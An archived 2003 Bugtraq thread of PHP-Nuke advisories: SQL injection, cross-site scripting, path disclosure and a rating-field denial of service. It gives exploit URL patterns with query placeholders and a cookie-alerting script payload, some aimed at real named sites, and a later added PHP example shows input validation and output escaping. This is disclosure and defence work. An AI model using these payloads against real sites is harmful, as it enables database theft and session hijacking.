101063 2003-05-12 19:52 /95 lines/ Albert Puigsech Galicia <ripe@7a69ezine.org>
Imported: 2003-05-12 19:52 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External replies to: ripe@7a69ezine.org
Recipient: Bugtraq (import) <4853>
Subject: Lot of SQL injection on PHP-Nuke 6.5 (secure weblog!)
------------------------------------------------------------

/-----------------------------------------------------------------------------\
| 7 A 6 9 - A d v                                                      C: 010 |
|-----------------------------------------------------------------------------|
|                                                                             |
|                         [ PHP-Nuke SQL injection ]                          |
|                                                                             |
\-----------------------------------------------------------------------------/
                                                                 | 11/05/2003 |
                                                                 \------------/

Data.
------

+ Type: SQL injection.
+ Software: PHP-Nuke
+ Versions: 6.x (including 6.5) and 5.x
+ Exploit: Yes
+ Author: Albert Puigsech Galicia
+ Contact: ripe@7a69ezine.org

Introduction.
-------------

PhpNuke is a well known content management system programmed in PHP by
Francisco Bucci; a lot of people use it because it is very easy to install
and manage.

Description.
------------

The Web_Links module, included in the PHP-Nuke base package, has multiple
SQL injections (more than 20). The web user may be able to insert his own
SQL code in most of the numeric values included in queries, because the
plugin coder didn't use inverted commas.

Exploitation.
-------------

If the SQL agent allows us to use a UNION statement (like MySQL 4 does) it is
possible to extract information about anything inside the database; of course
this includes passwords, personal data, etc. Otherwise, without the UNION
possibility, we can't access SQL tables other than the web links management
ones, so the only possibility is to play with hits and votes.

Some examples:

[*] On the viewlink function:

$result = sql_query("select title,parentid from ".$prefix."_links_categories where cid=$cid", $dbi);

http://victim/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=2%20<our_code>

[*] Vim index.php... There are a lot.

Patch.
-------

There is no patch for this vulnerability. But it is easy to add inverted
commas on all numeric values.

Notes.
------

I am really surprised about PHP-Nuke usage. I can't understand how software
with PHP-Nuke's security history can be used. Lots of vulnerabilities have
been discovered in this software in the last months, and there are more bugs.
Recommendation for PHP-Nuke users: Migrate!

--
---------------------------
Albert Puigsech Galicia
http://ripe.7a69ezine.org
---------------------------
(101063) /Albert Puigsech Galicia <ripe@7a69ezine.org>/(reflowed)

101205 2003-05-13 19:59 /148 lines/ Rynho Zeros Web <hackargentino@gmx.net>
Imported: 2003-05-13 19:59 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <4867>
Comment on text 101063 by Albert Puigsech Galicia <ripe@7a69ezine.org>
Subject: Re: Lot of SQL injection on PHP-Nuke 6.5 (secure weblog!)
------------------------------------------------------------

I have also discovered a Path Disclosure on PHP-Nuke 6.x, and others?

Exploit:

http://victim.x/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=[any_words]
http://victim.x/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink

If [ any_words ] has a non-numerical value or a NULL value, this will produce
a "path disclosure". In addition to this form, as Ripe has reported, a SQL
injection can be made.

Patch (this is a temporary patch, but...
it is running)

In the viewlink function insert the following:

------------------------[ CODE ]------------------------
if (!isset($cid) || $cid == NULL || $cid == "" || !is_numeric($cid)) {
    echo "I don't like you >:|";
    exit();
}
------------------------[ CODE ]------------------------

------ XyborG ------
Thanks to Verstand & Chiz0
--
XyBØrG
Webmaster of: www.RZWEB.com.ar
Powered By Dattatec.Com
(101205) /Rynho Zeros Web <hackargentino@gmx.net>/(reflowed)

101206 2003-05-13 20:06 /48 lines/ Ferruh Mavituna <ferruh@mavituna.com>
Imported: 2003-05-13 20:06 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <4868>
Subject: PHPNuke "Your Account" XSS Vulnerability
------------------------------------------------------------

------------------------------------------------------
PHPNuke "Your Account" XSS Vulnerability
------------------------------------------------------

------------------------------------------------------
Vulnerable;
------------------------------------------------------
Francisco Burzi PHP-Nuke 6.5 Final Release

------------------------------------------------------
Not tested but 90% vulnerable;
------------------------------------------------------
Francisco Burzi PHP-Nuke 5.6
Francisco Burzi PHP-Nuke 6.0
Francisco Burzi PHP-Nuke 6.5 RC3
Francisco Burzi PHP-Nuke 6.5 RC2
Francisco Burzi PHP-Nuke 6.5 RC1
Francisco Burzi PHP-Nuke 6.5

------------------------------------------------------
About PHPNuke;
------------------------------------------------------
PHP Based Content Management System
http://www.phpnuke.org

------------------------------------------------------
Solution;
------------------------------------------------------
A simple string check or user check should be OK!

------------------------------------------------------
Exploit;
------------------------------------------------------
http://[victim]/modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>

*You may need to log in first.

**Some servers/PHP-Nuke systems have a security check for "<script>" strings
in query strings or POST variables (e.g. www.phphnuke.org). But these systems
are still vulnerable. You can skip these controls with some JS tricks.
Ferruh Mavituna
Freelance Developer & Designer
http://ferruh.mavituna.com
ferruh@mavituna.com
(101206) /Ferruh Mavituna <ferruh@mavituna.com>/(reflowed)

101230 2003-05-13 23:41 /133 lines/ Albert Puigsech Galicia <ripe@7a69ezine.org>
Imported: 2003-05-13 23:41 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External replies to: ripe@7a69ezine.org
Recipient: Bugtraq (import) <4880>
Subject: More and More SQL injection on PHP-Nuke 6.5.
------------------------------------------------------------

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

/-----------------------------------------------------------------------------\
| 7 A 6 9 - A d v                                                      C: 011 |
|-----------------------------------------------------------------------------|
|                                                                             |
|                         [ PHP-Nuke SQL injection ]                          |
|                                                                             |
\-----------------------------------------------------------------------------/
                                                                 | 13/05/2003 |
                                                                 \------------/

Data.
- ------

+ Type: SQL injection.
+ Software: PHP-Nuke
+ Versions: 6.x (including 6.5) and 5.x
+ Exploit: Yes
+ Author: Albert Puigsech Galicia
+ Contact: ripe@7a69ezine.org

Introduction.
- -------------

PhpNuke is a well known content management system programmed in PHP by
Francisco Bucci; a lot of people use it because it is very easy to install
and manage.

Description.
- ------------

PHP-Nuke's file download module includes SQL injection features (as usual).
The web user may be able to insert his own SQL code in most of the numeric
values included in queries, because the plugin coder didn't use inverted
commas.

Exploitation.
- ------------

If the SQL agent allows us to use a UNION statement (like MySQL 4 does) it is
possible to extract information about anything inside the database; of course
this includes passwords, personal data, etc. Otherwise, without the UNION
possibility, we can't access SQL tables other than the web links management
ones, so the only possibility is to play with hits and votes.
Some examples:

[*] On the getit function:

- ---
sql_query("update ".$prefix."_downloads_downloads set hits=hits+1 WHERE lid=$lid", $dbi);
$result = sql_query("SELECT url FROM ".$prefix."_downloads_downloads WHERE lid=$lid", $dbi);
- ---

http://www.caxa.ru/modules.php?name=Downloads&d_op=getit&lid=2%20<our_code>

[*] On the search function:

- ---
$result = sql_query("SELECT lid, cid, title, url, description, date, hits, downloadratingsummary, totalvotes, totalcomments, filesize, version, homepage FROM ".$prefix."_downloads_downloads WHERE title LIKE '%$query%' OR description LIKE '%$query%' ORDER BY $orderby LIMIT $min,$downloadsresults", $dbi);
- ---

http://www.caxa.ru/modules.php?name=Downloads&d_op=search&min=2%20<our_code>

[*] Vim index.php... There are a lot.

Patch.
- -------

There is no patch for this vulnerability. But it is easy to add inverted
commas on all numeric values.

Notes.
- ------

I am really surprised about PHP-Nuke usage. I can't understand how software
with PHP-Nuke's security history can be used. Lots of vulnerabilities have
been discovered in this software in the last months, and there are more bugs.
Recommendation for PHP-Nuke users: Migrate! There are a lot of CMSs coded
with security in mind: slashcode, scoop (written in perl), postnuke,
xsphpcms (nice) (written in php)... and more.
- --
- ---------------------------
Albert Puigsech Galicia
http://ripe.7a69ezine.org
- ---------------------------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (GNU/Linux)

iD8DBQE+wV+XwLHT7sE3+RsRAlkJAKCHrMxBRz2loJqPi8kGzFOmAAnN3QCeOhY7
rg1SmIxpzeiM6aaCmMxUdWQ=
=DmRV
-----END PGP SIGNATURE-----
(101230) /Albert Puigsech Galicia <ripe@7a69ezine.org>/(reflowed)

101734 2003-05-17 20:18 /62 lines/ Lorenzo Manuel Hernandez Garcia-Hierro <security@lorenzohgh.com>
Imported: 2003-05-17 20:18 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <4935>
Subject: PHP-Nuke code injection in Yearly Stats at Statistics module
------------------------------------------------------------

-------
Product: PHP-Nuke
Vendor: Francisco Burci
Versions Vulnerable: 6.0 without patches, 6.0 with index.php and mainfile.php
patches. 5.5 with patches (all remaining script tags)
Not vulnerable: 6.0 with the mainfile.php patch for blocking URL tag
inclusions (not all). 5.5 with script tags but with all the others.
------
DESCRIPTION:
------
I'm working now on Nuke-based portals. Searching for modules that use a
URL-based query, I found some bugs in the Statistics module: when you put a
string in the URL behind the &year variable, the module prints the characters
that you put. I tried iframe and it works; script tags work, object works,
applet works, meta works, style works, form works too, img works, comments and
SSI work.

--------
SOLUTION:
--------
Put this code in your mainfile.php:

/*
foreach ($HTTP_GET_VARS as $secvalue) {
    if ((eregi("<[^>]*script*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*object*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*iframe*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*applet*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*meta*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*style*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*form*\"?[^>]*>", $secvalue)) ||
        (eregi("<[^>]*img*\"?[^>]*>", $secvalue)) ||
        (eregi("\"", $secvalue))) {
        die ("Oh!
.");
    }
}
*/

NOTE: Remove the comment markers /* and */.

-----
WHAT CAN HAPPEN?
-----
Script and binary object inclusion. Normally it isn't a problem, but there
are many viruses written in VBScript and JavaScript/JS. An iframe can be used
for a link that a user visits, and there is an attack on the user through
known iframe vulnerabilities. With the code that I provide you're safe from
this little bug.

-----
CONTACT INFO:
---------------------------------------
Lorenzo Manuel Hernandez Garcia-Hierro
--- Computer Security Analyzer ---
-- www.novappc.com --
PGP: Keyfingerprint B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
**********************************
(101734) /Lorenzo Manuel Hernandez Garcia-Hierro <security@lorenzohgh.com>/

102046 2003-05-20 22:31 /157 lines/ Lorenzo Manuel Hernandez Garcia-Hierro <security@lorenzohgh.com>
Imported: 2003-05-20 22:31 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <4956>
Subject: PHP-Nuke Denial of Service attack and more SQL Injections
------------------------------------------------------------

-------
Product: PHP-Nuke
Vendor: Francisco Burzi
Versions Vulnerable:
Francisco Burzi PHP-Nuke 6.0
Francisco Burzi PHP-Nuke 6.5 RC3
Francisco Burzi PHP-Nuke 6.5 RC2
Francisco Burzi PHP-Nuke 6.5 RC1
Francisco Burzi PHP-Nuke 6.5 FINAL
Francisco Burzi PHP-Nuke 6.5 BETA 1
Francisco Burzi PHP-Nuke 6.5
6.5 with all patches, 6.0 with all patches. 5.5 with all patches
Not vulnerable: ?
------
DESCRIPTION:
------
New SQL injections and path disclosures related to the main modules. Please
look at the final `; other SQL injections don't use this, but it is very
important for making a successful query.
--------
FOUND VULNERABLE MODULES:
--------

--------
- SECTIONS (NEW)
--------
Type: SQL Injection and Path Disclosure
*********
Exploit:
http://[target]/modules.php?name=Sections&op=listarticles&secid=`[YOUR QUERY] (NEW)
- http://[target]/modules.php?name=Sections&op=viewarticle&artid=`[YOUR QUERY] (NEW)
- http://[target]/modules.php?name=Sections&op=printpage&artid==`[YOUR QUERY] (NEW)

--------
- AVANTGO
--------
Type: SQL Injection and Path disclosure. (NEW)
*********
Exploit:
http://[target]/modules.php?name=AvantGo&file=print&sid=`[YOUR QUERY]

--------
- SURVEYS (NEW)
--------
Type: SQL Injection and Path disclosure.
********
Exploit:
http://[target]/modules.php?name=Surveys&pollID=`[YOUR QUERY]
- http://[target]/modules.php?name=Surveys&op=results&pollID=`[YOUR QUERY]&mode=&order=0&thold=0

--------
- DOWNLOADS
--------
Type: SQL Injection and Path disclosure. (NEW)
********
Exploit:
http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR QUERY]
- http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR QUERY]&orderby=titleD

-------------
NEW TYPE OF PHPNUKE ATTACK IN DOWNLOADS MODULE (NEW)
-------------
I found a possible denial of service attack in the Downloads module through
the rating system.

Exploit:
http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FILE TO RATE]&ratinguser=?&ratinghost_name=?&rating=99999999999999999999999999999999999999999999999999999999999999999999999

When the file is rated, the file gets a 238,609,298.89 rating. This can be
used to make a denial of service attack on the MySQL server or to send a very
long buffer (buffer overflow, stack crashes). The MySQL server stores this
because there is an error with the query (more characters in the field than
the allowed number of characters); if you send a buffer longer than the
allowed/accepted one, the server becomes unstable and the system picks up.
Exploit for SQL Injection and Denial of Service Attack:
http://www.phpnuke-espanol.org/modules.php?name=Downloads&ratinglid=[FILE TO RATE]&ratinguser=?&ratinghost_name=?&rating=`[HERE GOES SQL QUERY]

--------
- REVIEWS (NEW)
--------
Type: SQL Injection and Path disclosure.
********
Exploit:
http://[target]/modules.php?name=Reviews&rop=showcontent&id=`[YOUR QUERY]

--------
- WEB_LINKS
--------
Type: SQL Injection (NEW) and Path disclosure. (NEW)
********
Exploit:
http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=`[YOUR QUERY]
- http://[target]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=`[YOUR QUERY]&ratetype=num
- The Web_Links module is affected by the possible DoS attack that I
discovered, and by the SQL injections and buffer overflows:
Exploit:
http://[target]/modules.php?name=Web_Links&ratinglid=96&ratinguser=?&ratinghost_name=?&rating=[DATA]
[DATA] = your random data to send (rating points and the field buffer, of course).

--------
SOLUTION:
--------
- Deactivate the affected modules entirely.
- A temporary workaround for Path Disclosure is configuring the reported
error flags in php.ini (no report), but this is not a very good solution
(WORKAROUND).

-----
WHAT CAN HAPPEN? AND NOTES
-----
Gain access to the phpnuke database, content changing, gain access to private
info, server paths revealed. MySQL server buffer overflow, MySQL server pick
up, server pick up.

-NOTES-
I tested it on phpnuke-espanol.org and it is vulnerable to all. I tested it
on phpnuke.org and it is vulnerable on the active modules affected by this
(Downloads, Surveys) (some errors aren't reported because php.ini is
configured for this, but the vulnerabilities are present).
-----
CONTACT INFO:
---------------------------------------
Lorenzo Manuel Hernandez Garcia-Hierro
--- Computer Security Analyzer ---
-- www.novappc.com --
PGP: Keyfingerprint B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
**********************************
(102046) /Lorenzo Manuel Hernandez Garcia-Hierro <security@lorenzohgh.com>/(reflowed)

102047 2003-05-20 22:35 /34 lines/ Lorenzo Manuel Hernandez Garcia-Hierro <security@lorenzohgh.com>
Imported: 2003-05-20 22:35 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <4957>
Subject: PHP-Nuke module PHP-Banner-Exchange path disclosure
------------------------------------------------------------

-------
Product: PHP-Nuke
Vendor: F.Burzi
Module: PHP-Banner Exchange
Version: 1.2
-------

Accessing the PHP Banner Exchange module directly and without a specified
file:

http://[target]/modules/phpbannerexchange/ (phpbannerexchange module directory)

you get this:

Warning: main(mainfile.php) [function.main]: failed to create stream: No such file or directory in /home/phpnuke- /public_html/modules/phpbannerexchange/index.php on line 20

Fatal error: main() [function.main]: Failed opening required 'mainfile.php' (include_path='') in /home/phpnuke- /public_html/modules/phpbannerexchange/index.php on line 20

(Paths relative to your local paths on your server)

---------
SOLUTION:
---------
Configure your php.ini error flags, or hand-edit the original module files.
(102047) /Lorenzo Manuel Hernandez Garcia-Hierro <security@lorenzohgh.com>/(reflowed)
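The posts in this thread converge on one defensive pattern for the numeric parameters (cid, lid, min, artid, pollID, rating): quote them, as Albert Puigsech suggests, or refuse anything that is not a number, as XyborG's is_numeric() check does; the rating DoS post adds that the value must also be bounded, the two XSS posts that user text must be encoded before it is echoed, and the path-disclosure posts that PHP errors must stay out of the response. The PHP below is an added example written for this thread; it is not PHP-Nuke's code and not any poster's patch. The function names, the 'nuke' table prefix, the shape of the rating UPDATE, the 1..10 rating scale and the 400 response are all assumptions. It goes one step beyond XyborG's check on purpose: is_numeric() also accepts exponent and float forms ("2e3", "2.0", " 2"), so a digits-only match is used instead.

```php
<?php
// Added example for this thread: not PHP-Nuke code, not any poster's patch.
// Assumptions: table prefix 'nuke', rating scale 1..10, and the UPDATE shape.
declare(strict_types=1);

/**
 * Return $value as an int only if it is a canonical decimal integer within
 * [$min, $max]; otherwise null. Unlike is_numeric(), this rejects "2e3",
 * "2.0", " 2", "0x2", "+2", a 70-digit number, and anything with trailing
 * text such as "2 <our_code>", so nothing but digits ever reaches the query.
 */
function require_int($value, int $min, int $max): ?int
{
    if (!is_int($value) && !is_string($value)) {
        return null;                       // arrays (cid[]=...) are not integers
    }
    $s = (string) $value;
    if (preg_match('/^(?:0|[1-9][0-9]{0,17})$/', $s) !== 1) {
        return null;                       // at most 18 digits: fits a 64-bit int
    }
    $n = (int) $s;
    return ($n >= $min && $n <= $max) ? $n : null;
}

/** The viewlink query from the first advisory, built only from a validated id. */
function category_query(string $prefix, $cid): ?string
{
    $id = require_int($cid, 1, PHP_INT_MAX);
    if ($id === null) {
        return null;                       // caller answers 400; no SQL is run
    }
    return "select title,parentid from {$prefix}_links_categories where cid={$id}";
}

/** Illustrative rating update: both the item id and the score are bounded ints. */
function rating_query(string $prefix, $lid, $rating): ?string
{
    $id    = require_int($lid, 1, PHP_INT_MAX);
    $score = require_int($rating, 1, 10);  // assumed scale; a 71-digit value is refused
    if ($id === null || $score === null) {
        return null;
    }
    return "update {$prefix}_downloads_downloads set totalvotes=totalvotes+1, "
         . "downloadratingsummary=downloadratingsummary+{$score} where lid={$id}";
}

/** Encode user text for an HTML context (the Your_Account username, the &year value). */
function html_escape(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Keep PHP warnings and fatals out of the response body; log them instead. */
function hide_errors_from_clients(): void
{
    ini_set('display_errors', '0');
    ini_set('log_errors', '1');
}

if (PHP_SAPI === 'cli') {
    hide_errors_from_clients();
    // Constructed sample inputs: one valid id and several that must be refused.
    $inputs = ['2', '2 <our_code>', '2e3', '', 'abc', '-1', str_repeat('9', 71)];
    foreach ($inputs as $in) {
        printf("%-22s -> %s\n", var_export($in, true),
               category_query('nuke', $in) ?? 'rejected');
    }
    printf("%-22s -> %s\n", 'rating 7', rating_query('nuke', '96', '7') ?? 'rejected');
    printf("%-22s -> %s\n", 'rating 9...9', rating_query('nuke', '96', str_repeat('9', 71)) ?? 'rejected');
    echo html_escape('bla<script>alert(document.cookie)</script>'), "\n";
}
```

Running `php example.php` prints which of the constructed inputs are accepted; only the plain "2" yields a query, and the 71-digit rating from the DoS post is refused before any UPDATE is built. The queries are still assembled as strings, as on the page, so the change stays visible, but only an already-validated int is ever interpolated; with mysqli or PDO prepared statements the same require_int() value would be bound as a parameter instead. Note that the blacklist of tag names in the Statistics-module patch is a different layer entirely: encoding on output with html_escape() covers every tag, not only the listed ones, and hide_errors_from_clients() is the php.ini change the path-disclosure posts refer to, expressed at runtime.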